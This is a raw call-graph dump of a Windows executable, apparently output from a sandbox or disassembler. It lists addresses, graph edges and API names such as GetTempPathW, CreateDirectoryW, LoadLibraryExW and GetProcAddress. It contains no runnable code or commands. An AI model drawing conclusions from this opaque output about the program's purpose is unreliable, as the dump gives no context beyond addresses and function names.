16120->16119 16126 7ff67a623a74 16120->16126 16123 7ff67a61e0fd 16122->16123 16124 7ff67a614a4f 16122->16124 16123->16124 16170 7ff67a622dc0 16123->16170 16124->15735 16138 7ff67a61b810 GetLastError 16126->16138 16130 7ff67a623ace 16130->16119 16139 7ff67a61b851 FlsSetValue 16138->16139 16140 7ff67a61b834 FlsGetValue 16138->16140 16142 7ff67a61b863 16139->16142 16157 7ff67a61b841 16139->16157 16141 7ff67a61b84b 16140->16141 16140->16157 16141->16139 16144 7ff67a61f258 _findclose 11 API calls 16142->16144 16143 7ff67a61b8bd SetLastError 16145 7ff67a61b8ca 16143->16145 16146 7ff67a61b8dd 16143->16146 16147 7ff67a61b872 16144->16147 16145->16130 16160 7ff67a620db8 EnterCriticalSection 16145->16160 16161 7ff67a61ab9c 16146->16161 16148 7ff67a61b890 FlsSetValue 16147->16148 16149 7ff67a61b880 FlsSetValue 16147->16149 16152 7ff67a61b89c FlsSetValue 16148->16152 16153 7ff67a61b8ae 16148->16153 16151 7ff67a61b889 16149->16151 16155 7ff67a61b00c __free_lconv_num 11 API calls 16151->16155 16152->16151 16156 7ff67a61b5b8 _findclose 11 API calls 16153->16156 16155->16157 16158 7ff67a61b8b6 16156->16158 16157->16143 16159 7ff67a61b00c __free_lconv_num 11 API calls 16158->16159 16159->16143 16162 7ff67a623dc0 __FrameHandler3::FrameUnwindToEmptyState EnterCriticalSection LeaveCriticalSection 16161->16162 16163 7ff67a61aba5 16162->16163 16164 7ff67a61abb4 16163->16164 16165 7ff67a623e10 __FrameHandler3::FrameUnwindToEmptyState 44 API calls 16163->16165 16166 7ff67a61abe7 __FrameHandler3::FrameUnwindToEmptyState 16164->16166 16167 7ff67a61abbd IsProcessorFeaturePresent 16164->16167 16165->16164 16168 7ff67a61abcc 16167->16168 16169 7ff67a61acd8 _wfindfirst32i64 14 API calls 16168->16169 16169->16166 16171 7ff67a61b810 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16170->16171 16172 7ff67a622dc9 16171->16172 16180 7ff67a61546c EnterCriticalSection 16173->16180 16182 7ff67a6028ac 16181->16182 16183 7ff67a614bc4 49 API calls 16182->16183 16184 7ff67a6028fd 16183->16184 16185 7ff67a6155c4 _findclose 11 API calls 16184->16185 16186 7ff67a602902 16185->16186 16200 7ff67a6155e4 16186->16200 16189 7ff67a601ef0 49 API calls 16190 7ff67a602931 __scrt_get_show_window_mode 16189->16190 16191 7ff67a608be0 57 API calls 16190->16191 16192 7ff67a602966 16191->16192 16193 7ff67a6029a3 MessageBoxA 16192->16193 16194 7ff67a60296b 16192->16194 16196 7ff67a6029bd 16193->16196 16195 7ff67a608be0 57 API calls 16194->16195 16197 7ff67a602985 MessageBoxW 16195->16197 16198 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16196->16198 16197->16196 16199 7ff67a6029cd 16198->16199 16199->15388 16201 7ff67a61b988 _findclose 11 API calls 16200->16201 16202 7ff67a6155fb 16201->16202 16203 7ff67a602909 16202->16203 16204 7ff67a61f258 _findclose 11 API calls 16202->16204 16207 7ff67a61563b 16202->16207 16203->16189 16205 7ff67a615630 16204->16205 16206 7ff67a61b00c __free_lconv_num 11 API calls 16205->16206 16206->16207 16207->16203 16212 7ff67a61f928 16207->16212 16210 7ff67a61afc4 _wfindfirst32i64 17 API calls 16211 7ff67a615680 16210->16211 16216 7ff67a61f945 16212->16216 16213 7ff67a61f94a 16214 7ff67a615661 16213->16214 16215 7ff67a6155c4 _findclose 11 API calls 16213->16215 16214->16203 16214->16210 16217 7ff67a61f954 16215->16217 16216->16213 16216->16214 16219 7ff67a61f994 16216->16219 16218 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16217->16218 16218->16214 16219->16214 16220 7ff67a6155c4 _findclose 11 API calls 16219->16220 16220->16217 16222 7ff67a608d82 WideCharToMultiByte 16221->16222 16223 7ff67a608d14 WideCharToMultiByte 16221->16223 16224 7ff67a608daf 16222->16224 16228 7ff67a603f35 16222->16228 16225 7ff67a608d3e 16223->16225 16226 7ff67a608d55 16223->16226 16227 7ff67a6029e0 57 API calls 16224->16227 16229 7ff67a6029e0 57 API calls 16225->16229 16226->16222 16230 7ff67a608d6b 16226->16230 16227->16228 16228->15397 16228->15400 16229->16228 16231 7ff67a6029e0 57 API calls 16230->16231 16231->16228 16233 7ff67a61aab3 16232->16233 16236 7ff67a607bee 16232->16236 16234 7ff67a61ab3c __std_exception_copy 37 API calls 16233->16234 16233->16236 16235 7ff67a61aae0 16234->16235 16235->16236 16237 7ff67a61afc4 _wfindfirst32i64 17 API calls 16235->16237 16236->15415 16238 7ff67a61ab10 16237->16238 16240 7ff67a603fe0 116 API calls 16239->16240 16241 7ff67a601ad6 16240->16241 16242 7ff67a601c84 16241->16242 16243 7ff67a6082c0 83 API calls 16241->16243 16244 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16242->16244 16245 7ff67a601b0e 16243->16245 16246 7ff67a601c98 16244->16246 16270 7ff67a601b3f 16245->16270 16278 7ff67a610914 16245->16278 16246->15435 16272 7ff67a603e50 16246->16272 16248 7ff67a61028c 74 API calls 16248->16242 16249 7ff67a601b28 16250 7ff67a601b44 16249->16250 16251 7ff67a601b2c 16249->16251 16282 7ff67a6105dc 16250->16282 16252 7ff67a602890 59 API calls 16251->16252 16252->16270 16255 7ff67a601b5f 16258 7ff67a602890 59 API calls 16255->16258 16256 7ff67a601b77 16257 7ff67a610914 73 API calls 16256->16257 16259 7ff67a601bc4 16257->16259 16258->16270 16260 7ff67a601bee 16259->16260 16261 7ff67a601bd6 16259->16261 16263 7ff67a6105dc _fread_nolock 53 API calls 16260->16263 16262 7ff67a602890 59 API calls 16261->16262 16262->16270 16264 7ff67a601c03 16263->16264 16265 7ff67a601c1e 16264->16265 16266 7ff67a601c09 16264->16266 16285 7ff67a610350 16265->16285 16268 7ff67a602890 59 API calls 16266->16268 16268->16270 16270->16248 16271 7ff67a602b30 59 API calls 16271->16270 16273 7ff67a601ef0 49 API calls 16272->16273 16274 7ff67a603e6d 16273->16274 16274->15434 16276 7ff67a601ef0 49 API calls 16275->16276 16277 7ff67a604090 16276->16277 16277->15435 16279 7ff67a610944 16278->16279 16291 7ff67a6106a4 16279->16291 16281 7ff67a61095d 16281->16249 16303 7ff67a6105fc 16282->16303 16286 7ff67a610359 16285->16286 16287 7ff67a601c32 16285->16287 16288 7ff67a6155c4 _findclose 11 API calls 16286->16288 16287->16270 16287->16271 16289 7ff67a61035e 16288->16289 16292 7ff67a61070e 16291->16292 16293 7ff67a6106ce 16291->16293 16292->16293 16295 7ff67a61071a 16292->16295 16294 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16293->16294 16297 7ff67a6106f5 16294->16297 16302 7ff67a61546c EnterCriticalSection 16295->16302 16297->16281 16304 7ff67a610626 16303->16304 16305 7ff67a601b59 16303->16305 16304->16305 16306 7ff67a610672 16304->16306 16307 7ff67a610635 __scrt_get_show_window_mode 16304->16307 16305->16255 16305->16256 16316 7ff67a61546c EnterCriticalSection 16306->16316 16309 7ff67a6155c4 _findclose 11 API calls 16307->16309 16311 7ff67a61064a 16309->16311 16314 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16311->16314 16314->16305 16318 7ff67a60869f GetTokenInformation 16317->16318 16319 7ff67a608721 __vcrt_freefls 16317->16319 16320 7ff67a6086cb 16318->16320 16321 7ff67a6086c0 GetLastError 16318->16321 16322 7ff67a60873a 16319->16322 16323 7ff67a608734 CloseHandle 16319->16323 16320->16319 16324 7ff67a6086e7 GetTokenInformation 16320->16324 16321->16319 16321->16320 16322->15444 16323->16322 16324->16319 16325 7ff67a60870a 16324->16325 16325->16319 16326 7ff67a608714 ConvertSidToStringSidW 16325->16326 16326->16319 16328 7ff67a608775 16327->16328 16344 7ff67a614e18 16328->16344 16332 7ff67a602c70 16331->16332 16333 7ff67a614bc4 49 API calls 16332->16333 16334 7ff67a602cbb __scrt_get_show_window_mode 16333->16334 16335 7ff67a608be0 57 API calls 16334->16335 16336 7ff67a602cf0 16335->16336 16337 7ff67a602cf5 16336->16337 16338 7ff67a602d2d MessageBoxA 16336->16338 16339 7ff67a608be0 57 API calls 16337->16339 16340 7ff67a602d47 16338->16340 16341 7ff67a602d0f MessageBoxW 16339->16341 16342 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16340->16342 16341->16340 16343 7ff67a602d57 16342->16343 16343->15454 16347 7ff67a614e72 16344->16347 16345 7ff67a614e97 16346 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16345->16346 16361 7ff67a614ec1 16346->16361 16347->16345 16348 7ff67a614ed3 16347->16348 16362 7ff67a6131d0 16348->16362 16351 7ff67a614fb4 16353 7ff67a61b00c __free_lconv_num 11 API calls 16351->16353 16352 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16354 7ff67a608798 16352->16354 16353->16361 16354->15451 16355 7ff67a614f89 16358 7ff67a61b00c __free_lconv_num 11 API calls 16355->16358 16356 7ff67a614fda 16356->16351 16357 7ff67a614fe4 16356->16357 16360 7ff67a61b00c __free_lconv_num 11 API calls 16357->16360 16358->16361 16359 7ff67a614f80 16359->16351 16359->16355 16360->16361 16361->16352 16363 7ff67a61320e 16362->16363 16364 7ff67a6131fe 16362->16364 16365 7ff67a613217 16363->16365 16371 7ff67a613245 16363->16371 16366 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16364->16366 16367 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16365->16367 16368 7ff67a61323d 16366->16368 16367->16368 16368->16351 16368->16355 16368->16356 16368->16359 16371->16364 16371->16368 16373 7ff67a613be4 16371->16373 16406 7ff67a613630 16371->16406 16443 7ff67a612dc0 16371->16443 16374 7ff67a613c26 16373->16374 16375 7ff67a613c97 16373->16375 16376 7ff67a613c2c 16374->16376 16377 7ff67a613cc1 16374->16377 16378 7ff67a613c9c 16375->16378 16379 7ff67a613cf0 16375->16379 16380 7ff67a613c60 16376->16380 16381 7ff67a613c31 16376->16381 16462 7ff67a611f94 16377->16462 16382 7ff67a613c9e 16378->16382 16383 7ff67a613cd1 16378->16383 16384 7ff67a613d07 16379->16384 16385 7ff67a613cfa 16379->16385 16390 7ff67a613cff 16379->16390 16387 7ff67a613c37 16380->16387 16380->16390 16381->16384 16381->16387 16388 7ff67a613c40 16382->16388 16393 7ff67a613cad 16382->16393 16469 7ff67a611b84 16383->16469 16476 7ff67a6148ec 16384->16476 16385->16377 16385->16390 16387->16388 16394 7ff67a613c72 16387->16394 16403 7ff67a613c5b 16387->16403 16404 7ff67a613d30 16388->16404 16446 7ff67a614398 16388->16446 16390->16404 16480 7ff67a6123a4 16390->16480 16393->16377 16396 7ff67a613cb2 16393->16396 16394->16404 16456 7ff67a6146d4 16394->16456 16399 7ff67a614798 37 API calls 16396->16399 16396->16404 16398 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16400 7ff67a61402a 16398->16400 16399->16403 16400->16371 16401 7ff67a614a00 45 API calls 16405 7ff67a613f1c 16401->16405 16403->16401 16403->16404 16403->16405 16404->16398 16405->16404 16487 7ff67a61f0c8 16405->16487 16407 7ff67a61363e 16406->16407 16408 7ff67a613654 16406->16408 16410 7ff67a613c26 16407->16410 16411 7ff67a613c97 16407->16411 16423 7ff67a613694 16407->16423 16409 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16408->16409 16408->16423 16409->16423 16412 7ff67a613c2c 16410->16412 16413 7ff67a613cc1 16410->16413 16414 7ff67a613c9c 16411->16414 16415 7ff67a613cf0 16411->16415 16416 7ff67a613c60 16412->16416 16417 7ff67a613c31 16412->16417 16422 7ff67a611f94 38 API calls 16413->16422 16418 7ff67a613c9e 16414->16418 16419 7ff67a613cd1 16414->16419 16420 7ff67a613d07 16415->16420 16421 7ff67a613cfa 16415->16421 16428 7ff67a613cff 16415->16428 16424 7ff67a613c37 16416->16424 16416->16428 16417->16420 16417->16424 16425 7ff67a613c40 16418->16425 16430 7ff67a613cad 16418->16430 16426 7ff67a611b84 38 API calls 16419->16426 16429 7ff67a6148ec 45 API calls 16420->16429 16421->16413 16421->16428 16439 7ff67a613c5b 16422->16439 16423->16371 16424->16425 16431 7ff67a613c72 16424->16431 16424->16439 16427 7ff67a614398 47 API calls 16425->16427 16441 7ff67a613d30 16425->16441 16426->16439 16427->16439 16432 7ff67a6123a4 38 API calls 16428->16432 16428->16441 16429->16439 16430->16413 16433 7ff67a613cb2 16430->16433 16434 7ff67a6146d4 46 API calls 16431->16434 16431->16441 16432->16439 16436 7ff67a614798 37 API calls 16433->16436 16433->16441 16434->16439 16435 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16437 7ff67a61402a 16435->16437 16436->16439 16437->16371 16438 7ff67a614a00 45 API calls 16442 7ff67a613f1c 16438->16442 16439->16438 16439->16441 16439->16442 16440 7ff67a61f0c8 46 API calls 16440->16442 16441->16435 16442->16440 16442->16441 16521 7ff67a611208 16443->16521 16447 7ff67a6143be 16446->16447 16448 7ff67a610dc0 12 API calls 16447->16448 16449 7ff67a61440e 16448->16449 16450 7ff67a61ec30 46 API calls 16449->16450 16459 7ff67a614709 16456->16459 16457 7ff67a61474e 16457->16403 16458 7ff67a614727 16461 7ff67a61f0c8 46 API calls 16458->16461 16459->16457 16459->16458 16460 7ff67a614a00 45 API calls 16459->16460 16460->16458 16461->16457 16463 7ff67a611fc7 16462->16463 16464 7ff67a611ff6 16463->16464 16466 7ff67a6120b3 16463->16466 16468 7ff67a612033 16464->16468 16499 7ff67a610e68 16464->16499 16467 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16466->16467 16467->16468 16468->16403 16471 7ff67a611bb7 16469->16471 16470 7ff67a611be6 16472 7ff67a610e68 12 API calls 16470->16472 16475 7ff67a611c23 16470->16475 16471->16470 16473 7ff67a611ca3 16471->16473 16472->16475 16474 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16473->16474 16474->16475 16475->16403 16477 7ff67a61492f 16476->16477 16478 7ff67a614933 __crtLCMapStringW 16477->16478 16507 7ff67a614988 16477->16507 16478->16403 16481 7ff67a6123d7 16480->16481 16482 7ff67a612406 16481->16482 16484 7ff67a6124c3 16481->16484 16483 7ff67a610e68 12 API calls 16482->16483 16486 7ff67a612443 16482->16486 16483->16486 16485 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16484->16485 16485->16486 16486->16403 16489 7ff67a61f0f9 16487->16489 16497 7ff67a61f107 16487->16497 16488 7ff67a61f127 16489->16488 16489->16497 16497->16405 16500 7ff67a610e9f 16499->16500 16506 7ff67a610e8e 16499->16506 16501 7ff67a61dcbc _fread_nolock 12 API calls 16500->16501 16500->16506 16506->16468 16508 7ff67a6149a6 16507->16508 16509 7ff67a6149ae 16507->16509 16510 7ff67a614a00 45 API calls 16508->16510 16509->16478 16510->16509 16522 7ff67a61123d 16521->16522 16523 7ff67a61124f 16521->16523 16524 7ff67a6155c4 _findclose 11 API calls 16522->16524 16525 7ff67a611299 16523->16525 16527 7ff67a61125d 16523->16527 16526 7ff67a611242 16524->16526 16531 7ff67a6155c4 _findclose 11 API calls 16525->16531 16537 7ff67a611615 16525->16537 16528 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16526->16528 16529 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16527->16529 16536 7ff67a61124d 16528->16536 16529->16536 16530 7ff67a6155c4 _findclose 11 API calls 16532 7ff67a6118a9 16530->16532 16533 7ff67a61160a 16531->16533 16534 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16532->16534 16535 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16533->16535 16534->16536 16535->16537 16536->16371 16537->16530 16537->16536 16539 7ff67a607976 16538->16539 16540 7ff67a6079ed GetTempPathW 16539->16540 16541 7ff67a60799a 16539->16541 16543 7ff67a607a02 16540->16543 16542 7ff67a607b70 61 API calls 16541->16542 16544 7ff67a6079a6 16542->16544 16577 7ff67a602830 16543->16577 16589 7ff67a607430 16544->16589 16554 7ff67a607a1b __vcrt_freefls 16555 7ff67a607ac6 16554->16555 16560 7ff67a607a51 16554->16560 16581 7ff67a618ba4 16554->16581 16584 7ff67a608b80 16554->16584 16578 7ff67a602855 16577->16578 16579 7ff67a614e18 48 API calls 16578->16579 16580 7ff67a602874 16579->16580 16580->16554 16623 7ff67a6187d0 16581->16623 16585 7ff67a608ba6 CreateDirectoryW 16584->16585 16586 7ff67a608b90 16584->16586 16585->16554 16590 7ff67a60743c 16589->16590 16591 7ff67a608be0 57 API calls 16590->16591 16592 7ff67a60745e 16591->16592 16593 7ff67a607479 ExpandEnvironmentStringsW 16592->16593 16594 7ff67a607466 16592->16594 16596 7ff67a60749f __vcrt_freefls 16593->16596 16595 7ff67a602b30 59 API calls 16594->16595 16871 7ff67a60173e 16870->16871 16872 7ff67a601726 16870->16872 16874 7ff67a601744 16871->16874 16875 7ff67a601768 16871->16875 16873 7ff67a602b30 59 API calls 16872->16873 16876 7ff67a601732 16873->16876 17002 7ff67a6012b0 16874->17002 16963 7ff67a607c20 16875->16963 16876->15486 16881 7ff67a60178d 16884 7ff67a602890 59 API calls 16881->16884 16882 7ff67a6017b9 16885 7ff67a603fe0 116 API calls 16882->16885 16883 7ff67a60175f 16883->15486 16887 7ff67a6017a3 16884->16887 16888 7ff67a6017ce 16885->16888 16886 7ff67a602b30 59 API calls 16886->16883 16887->15486 16889 7ff67a6017ee 16888->16889 16890 7ff67a6017d6 16888->16890 16892 7ff67a610914 73 API calls 16889->16892 16891 7ff67a602b30 59 API calls 16890->16891 16893 7ff67a6017e5 16891->16893 16894 7ff67a6017ff 16892->16894 16913 7ff67a602d86 16912->16913 16914 7ff67a601ef0 49 API calls 16913->16914 16915 7ff67a602db9 16914->16915 16916 7ff67a603e50 49 API calls 16915->16916 16962 7ff67a6030ea 16915->16962 16917 7ff67a602e27 16916->16917 16918 7ff67a603e50 49 API calls 16917->16918 16919 7ff67a602e38 16918->16919 16920 7ff67a602e95 16919->16920 16921 7ff67a602e59 16919->16921 16923 7ff67a6031b0 75 API calls 16920->16923 17128 7ff67a6031b0 16921->17128 16924 7ff67a602e93 16923->16924 16925 7ff67a602ed4 16924->16925 16926 7ff67a602f16 16924->16926 17136 7ff67a6075b0 16925->17136 16927 7ff67a6031b0 75 API calls 16926->16927 16929 7ff67a602f40 16927->16929 16933 7ff67a6031b0 75 API calls 16929->16933 16942 7ff67a602fdc 16929->16942 16936 7ff67a602f72 16933->16936 16939 7ff67a6031b0 75 API calls 16936->16939 16936->16942 16937 7ff67a601eb0 59 API calls 16942->16937 16954 7ff67a6030ef 16942->16954 16964 7ff67a607c30 16963->16964 16965 7ff67a601ef0 49 API calls 16964->16965 16966 7ff67a607c71 16965->16966 16981 7ff67a607cf1 16966->16981 17045 7ff67a603f70 16966->17045 16968 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16970 7ff67a601785 16968->16970 16970->16881 16970->16882 16971 7ff67a607d2b 17051 7ff67a6077d0 16971->17051 16974 7ff67a607ce0 16977 7ff67a602c50 59 API calls 16974->16977 16975 7ff67a607d14 16978 7ff67a602c50 59 API calls 16975->16978 16976 7ff67a607b70 61 API calls 16979 7ff67a607ca2 __vcrt_freefls 16976->16979 16977->16981 16978->16971 16979->16974 16979->16975 16981->16968 17003 7ff67a6012c2 17002->17003 17004 7ff67a603fe0 116 API calls 17003->17004 17005 7ff67a6012f2 17004->17005 17006 7ff67a601311 17005->17006 17007 7ff67a6012fa 17005->17007 17008 7ff67a610914 73 API calls 17006->17008 17009 7ff67a602b30 59 API calls 17007->17009 17010 7ff67a601323 17008->17010 17014 7ff67a60130a __vcrt_freefls 17009->17014 17011 7ff67a60134d 17010->17011 17012 7ff67a601327 17010->17012 17018 7ff67a601390 17011->17018 17019 7ff67a601368 17011->17019 17013 7ff67a602890 59 API calls 17012->17013 17015 7ff67a60133e 17013->17015 17016 7ff67a60bdc0 _wfindfirst32i64 8 API calls 17014->17016 17017 7ff67a61028c 74 API calls 17015->17017 17021 7ff67a601454 17016->17021 17017->17014 17020 7ff67a6013aa 17018->17020 17033 7ff67a601463 17018->17033 17022 7ff67a602890 59 API calls 17019->17022 17023 7ff67a601050 98 API calls 17020->17023 17021->16883 17021->16886 17025 7ff67a601383 17022->17025 17026 7ff67a6013bb 17023->17026 17024 7ff67a6013c3 17027 7ff67a61028c 74 API calls 17024->17027 17028 7ff67a61028c 74 API calls 17025->17028 17026->17024 17029 7ff67a6014d2 __vcrt_freefls 17026->17029 17030 7ff67a6013cf 17027->17030 17028->17014 17036 7ff67a61028c 74 API calls 17029->17036 17032 7ff67a6077d0 64 API calls 17030->17032 17031 7ff67a6105dc _fread_nolock 53 API calls 17031->17033 17033->17024 17033->17031 17035 7ff67a6014bb 17033->17035 17037 7ff67a602890 59 API calls 17035->17037 17036->17014 17037->17029 17046 7ff67a603f7a 17045->17046 17047 7ff67a608be0 57 API calls 17046->17047 17048 7ff67a603fa2 17047->17048 17049 7ff67a60bdc0 _wfindfirst32i64 8 API calls 17048->17049 17050 7ff67a603fca 17049->17050 17050->16971 17050->16976 17050->16979 17052 7ff67a6077e0 17051->17052 17053 7ff67a601ef0 49 API calls 17052->17053 17129 7ff67a6031e4 17128->17129 17130 7ff67a614bc4 49 API calls 17129->17130 17131 7ff67a60320a 17130->17131 17132 7ff67a60321b 17131->17132 17188 7ff67a615eec 17131->17188 17134 7ff67a60bdc0 _wfindfirst32i64 8 API calls 17132->17134 17135 7ff67a603239 17134->17135 17135->16924 17137 7ff67a6075be 17136->17137 17138 7ff67a603fe0 116 API calls 17137->17138 17139 7ff67a6075ed 17138->17139 17189 7ff67a615f09 17188->17189 17190 7ff67a615f15 17188->17190 17205 7ff67a615800 17189->17205 17230 7ff67a615098 17190->17230 17231 7ff67a6150bc 17230->17231 17237 7ff67a6150b7 17230->17237 17231->17237 17452 7ff67a6164dc 17451->17452 17453 7ff67a616502 17452->17453 17456 7ff67a616535 17452->17456 17454 7ff67a6155c4 _findclose 11 API calls 17453->17454 17455 7ff67a616507 17454->17455 17457 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 17455->17457 17458 7ff67a616548 17456->17458 17459 7ff67a61653b 17456->17459 17469 7ff67a604039 17457->17469 17470 7ff67a61b2ec 17458->17470 17460 7ff67a6155c4 _findclose 11 API calls 17459->17460 17460->17469 17469->15561 17483 7ff67a620db8 EnterCriticalSection 17470->17483 17831 7ff67a6191a0 17830->17831 17834 7ff67a618c7c 17831->17834 17835 7ff67a618c97 17834->17835 17836 7ff67a618cc6 17834->17836 17837 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 17835->17837 17844 7ff67a61546c EnterCriticalSection 17836->17844 17846 7ff67a6100b1 17845->17846 17847 7ff67a610083 17845->17847 17857 7ff67a60c02e RtlLookupFunctionEntry 17856->17857 17858 7ff67a60be4b 17857->17858 17859 7ff67a60c044 RtlVirtualUnwind 17857->17859 17860 7ff67a60bde0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17858->17860 17859->17857 17859->17858 17862 7ff67a603fe0 116 API calls 17861->17862 17863 7ff67a6015c7 17862->17863 17864 7ff67a6015f0 17863->17864 17865 7ff67a6015cf 17863->17865 17867 7ff67a610914 73 API calls 17864->17867 17866 7ff67a602b30 59 API calls 17865->17866 17868 7ff67a6015df 17866->17868 17869 7ff67a601601 17867->17869 17868->15589 17870 7ff67a601605 17869->17870 17871 7ff67a601621 17869->17871 17872 7ff67a602890 59 API calls 17870->17872 17873 7ff67a601651 17871->17873 17874 7ff67a601631 17871->17874 17882 7ff67a60161c __vcrt_freefls 17872->17882 17876 7ff67a601666 17873->17876 17881 7ff67a60167d 17873->17881 17875 7ff67a602890 59 API calls 17874->17875 17875->17882 17878 7ff67a601050 98 API calls 17876->17878 17877 7ff67a61028c 74 API calls 17879 7ff67a6016f7 17877->17879 17878->17882 17879->15589 17880 7ff67a6105dc _fread_nolock 53 API calls 17880->17881 17881->17880 17881->17882 17883 7ff67a6016be 17881->17883 17882->17877 17884 7ff67a602890 59 API calls 17883->17884 17884->17882 17887 7ff67a6019d3 17885->17887 17888 7ff67a60196f 17885->17888 17886 7ff67a615170 45 API calls 17886->17888 17887->15607 17888->17886 17888->17887 17890 7ff67a608be0 57 API calls 17889->17890 17891 7ff67a608287 LoadLibraryExW 17890->17891 17892 7ff67a6082a4 __vcrt_freefls 17891->17892 17892->15616 17894 7ff67a606f4c GetProcAddress 17893->17894 17895 7ff67a606f29 17893->17895 17894->17895 17953 7ff67a605be0 17952->17953 17954 7ff67a601ef0 49 API calls 17953->17954 17955 7ff67a605c12 17954->17955 17956 7ff67a605c3b 17955->17956 17957 7ff67a605c1b 17955->17957 17958 7ff67a605c92 17956->17958 17960 7ff67a604060 49 API calls 17956->17960 17959 7ff67a602b30 59 API calls 17957->17959 17961 7ff67a604060 49 API calls 17958->17961 17979 7ff67a605c31 17959->17979 17962 7ff67a605c5c 17960->17962 17963 7ff67a605cab 17961->17963 17964 7ff67a605c7a 17962->17964 17968 7ff67a602b30 59 API calls 17962->17968 17966 7ff67a605cc9 17963->17966 17971 7ff67a602b30 59 API calls 17963->17971 17969 7ff67a603f70 57 API calls 17964->17969 17965 7ff67a60bdc0 _wfindfirst32i64 8 API calls 17970 7ff67a60346e 17965->17970 17967 7ff67a608270 58 API calls 17966->17967 17972 7ff67a605cd6 17967->17972 17968->17964 17973 7ff67a605c84 17969->17973 17970->15637 17980 7ff67a605d30 17970->17980 17971->17966 17974 7ff67a605cfd 17972->17974 17975 7ff67a605cdb 17972->17975 17973->17958 17978 7ff67a608270 58 API calls 17973->17978 18050 7ff67a6051f0 GetProcAddress 17974->18050 17976 7ff67a6029e0 57 API calls 17975->17976 17976->17979 17978->17958 17979->17965 18134 7ff67a604df0 17980->18134 17982 7ff67a605d54 17983 7ff67a605d6d 17982->17983 17984 7ff67a605d5c 17982->17984 18141 7ff67a604540 17983->18141 17985 7ff67a602b30 59 API calls 17984->17985 17991 7ff67a605d68 17985->17991 18051 7ff67a605212 18050->18051 18052 7ff67a605230 GetProcAddress 18050->18052 18054 7ff67a6029e0 57 API calls 18051->18054 18052->18051 18053 7ff67a605255 GetProcAddress 18052->18053 18053->18051 18055 7ff67a60527a GetProcAddress 18053->18055 18057 7ff67a605225 18054->18057 18055->18051 18056 7ff67a6052a2 GetProcAddress 18055->18056 18056->18051 18057->17979 18137 7ff67a604e15 18134->18137 18135 7ff67a604e1d 18135->17982 18136 7ff67a60515a __vcrt_freefls 18136->17982 18137->18135 18139 7ff67a604faf 18137->18139 18176 7ff67a6170b8 18137->18176 18138 7ff67a604260 47 API calls 18138->18139 18139->18136 18139->18138 18142 7ff67a604570 18141->18142 18177 7ff67a6170e8 18176->18177 18180 7ff67a6165b4 18177->18180 18181 7ff67a6165e5 18180->18181 18183 7ff67a6165f7 18180->18183 18182 7ff67a6155c4 _findclose 11 API calls 18181->18182 18184 7ff67a616641 18183->18184 18186 7ff67a616604 18183->18186 18276 7ff67a61b810 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18275->18276 18278 7ff67a61aa71 18276->18278 18277 7ff67a61ab9c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18279 7ff67a61aa91 18277->18279 18278->18277 18347 7ff67a61fdec 18348 7ff67a61ffde 18347->18348 18350 7ff67a61fe2e _isindst 18347->18350 18349 7ff67a6155c4 _findclose 11 API calls 18348->18349 18367 7ff67a61ffce 18349->18367 18350->18348 18353 7ff67a61feae _isindst 18350->18353 18351 7ff67a60bdc0 _wfindfirst32i64 8 API calls 18352 7ff67a61fff9 18351->18352 18368 7ff67a626a04 18353->18368 18358 7ff67a62000a 18360 7ff67a61afc4 _wfindfirst32i64 17 API calls 18358->18360 18361 7ff67a62001e 18360->18361 18365 7ff67a61ff0b 18365->18367 18393 7ff67a626a48 18365->18393 18367->18351 18369 7ff67a61fecc 18368->18369 18370 7ff67a626a13 18368->18370 18375 7ff67a625e08 18369->18375 18400 7ff67a620db8 EnterCriticalSection 18370->18400 18376 7ff67a625e11 18375->18376 18378 7ff67a61fee1 18375->18378 18377 7ff67a6155c4 _findclose 11 API calls 18376->18377 18379 7ff67a625e16 18377->18379 18378->18358 18381 7ff67a625e38 18378->18381 18380 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 18379->18380 18380->18378 18382 7ff67a625e41 18381->18382 18386 7ff67a61fef2 18381->18386 18383 7ff67a6155c4 _findclose 11 API calls 18382->18383 18384 7ff67a625e46 18383->18384 18385 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 18384->18385 18385->18386 18386->18358 18387 7ff67a625e68 18386->18387 18388 7ff67a625e71 18387->18388 18389 7ff67a61ff03 18387->18389 18390 7ff67a6155c4 _findclose 11 API calls 18388->18390 18389->18358 18389->18365 18391 7ff67a625e76 18390->18391 18392 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 18391->18392 18392->18389 18401 7ff67a620db8 EnterCriticalSection 18393->18401 18402 7ff67a619ff1 18403 7ff67a61aa68 45 API calls 18402->18403 18404 7ff67a619ff6 18403->18404 18405 7ff67a61a067 18404->18405 18406 7ff67a61a01d GetModuleHandleW 18404->18406 18414 7ff67a619ef4 18405->18414 18406->18405 18412 7ff67a61a02a 18406->18412 18412->18405 18428 7ff67a61a118 GetModuleHandleExW 18412->18428 18434 7ff67a620db8 EnterCriticalSection 18414->18434 18429 7ff67a61a14c GetProcAddress 18428->18429 18430 7ff67a61a175 18428->18430 18431 7ff67a61a15e 18429->18431 18432 7ff67a61a17a FreeLibrary 18430->18432 18433 7ff67a61a181 18430->18433 18431->18430 18432->18433 18433->18405 18700 7ff67a62aa6e 18701 